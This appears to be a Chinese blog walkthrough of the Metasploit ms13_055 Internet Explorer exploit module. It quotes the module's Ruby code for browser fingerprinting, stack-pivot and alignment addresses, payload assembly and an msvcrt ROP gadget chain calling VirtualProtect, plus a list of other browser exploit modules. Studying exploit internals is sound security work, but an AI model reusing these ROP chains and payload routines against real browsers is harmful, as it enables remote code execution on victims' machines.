ms13_055 metasploit
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254
daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0
esp_align代表的汇编语句的作用是对齐esp,即栈指针。
87 def get_target(agent)
88 return target if target.name != 'Automatic'
89
90 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
91 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
92
93 ie_name = "IE #{ie}"
94
95 case nt
96 when '5.1'
97 os_name = 'Windows XP SP3'
98 when '6.1'
99 os_name = 'Windows 7'
100 end
101
102 targets.each do |t|
103 if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104 return t
105 end
106 end
107
108 nil
109 end
188 def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)
当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来
返回与版本相关的数据
52 'Targets' =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],
如果当前的系统不支持,就会返回404页面。
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
123
124 p = esp_align + payload.encoded + rand_text_alpha(12000)
125 generate_rop_payload(rop_dll, p, opts)
126 end
generate_rop_payload
77 def generate_rop_payload(rop, payload, opts={})
78 nop = opts['nop'] || nil
79 badchars = opts['badchars'] || ''
80 pivot = opts['pivot'] || ''
81 target = opts['target'] || ''
82 base = opts['base'] || nil
83
84 rop = select_rop(rop, {'target'=>target, 'base'=>base})
85 # Replace the reserved words with actual gadgets
86 rop = rop.map {|e|
87 if e == :nop
88 sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
89 elsif e == :junk
90 Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
91 elsif e == :size
92 payload.length
93 elsif e == :unsafe_negate_size
94 get_unsafe_size(payload.length)
95 elsif e == :safe_negate_size
96 get_safe_size(payload.length)
97 else
98 e
99 end
100 }.pack("V*")
101
102 raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103
104 return pivot + rop + payload
105 end
会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。
3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>
在查找Windows下Browser相关的ROP漏洞
daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)
ms13_055 metasploit的更多相关文章
- Metasploit各版本对比
功能特性 描述 Metasploit Framework Metasploit Community Metasploit Express Metasploit Pro Pricing ...
- 关于kali2.0rolling中metasploit升级后无法启动问题的解决总结
最近在学习metasploit的使用,文中提到可以使用msfupdate命令来对metasploit的payload.exploit等进行升级,我就试了一下,没想到升级过程并不麻烦,但升级后却出现了无 ...
- [转]初探Metasploit的自动攻击
1. 科普Metasploit 以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...
- 移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit
在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对 ...
- metasploit渗透初探MR.robot(一)
看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...
- metasploit用法
1.msfconsole 进入metasploit 2.help connect 查看帮助 3.msfcli -h 查看帮助 4.ms08_067_netapi O 字符命令后加“O”,查看配置 5. ...
- chapter1 渗透测试与metasploit
网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...
- 原创教程:《metasploit新手指南》介绍及下载
原创教程:<metasploit新手指南>介绍及下载 1.1 作者简介 这份教程并不是“玄魂工作室”原创,但是我还是要力推给大家.相比那些一连几年都在问“我怎么才能入门”的人而言,我们更欣 ...
- kali 2.0 启动metasploit服务
kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 首先启动po ...
随机推荐
- nginx配置相关问题
1. nginx配置ssl相关问题 1.1 报错nginx: [emerg] the "ssl" parameter requires ngx_http_ssl_module in ...
- 如何制作一个可以用Bochs调试的最新内核系统盘
参考:http://blog.chinaunix.net/uid-26207112-id-3332621.html 1. 正确地创建一个包含启动分区的磁盘映像 1.1 创建磁盘映像文件 首先需要对磁盘 ...
- 使用 nm-applet 连接 WPA2-Enterprise wireless
安装之后,使用 nm-connetion-editor 编辑连接信息: 之使 systemctl retart NetworkManager: 之后使用 nmcli conn up $CONNECT_ ...
- jQ无法设置checkbox变成选中状态
设置以后checkbox并没有变成选中状态,用chrome调试看了一下,checkbox中确实有checked属性,针对这个问题,大家可以参考下本文 代码如下: $("input" ...
- Springboot01-web
Springboot快速构建 访问http://start.spring.io 构建springboot项目,这里选择版本2.0.4 单击Generate Project按钮下载springboot ...
- Codeforces 492D Vanya and Computer Game
D. Vanya and Computer Game time limit per test 2 seconds memory limit per test 256 megabytes input s ...
- C#实体类get和set的作用
一,实体类属性访问存在两种写法: //第一种写法 private int _id; public int Id { set { _id = value; } get { return _id; } } ...
- 记录Angular2.0学习遇到的问题
最近开始学习Angular2.0,准备持续记录下踩过得坑 1如何读取本地json文件: 需要通过http请求读取本地json文件,数据文件要放在assets文件夹下面 Service中的代码如下: ...
- 2018-12-25-win2d-图片水印
title author date CreateTime categories win2d 图片水印 lindexi 2018-12-25 10:37:52 +0800 2018-03-19 08:3 ...
- jQuery效果-隐藏与显示 小方块的移除
html <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <ti ...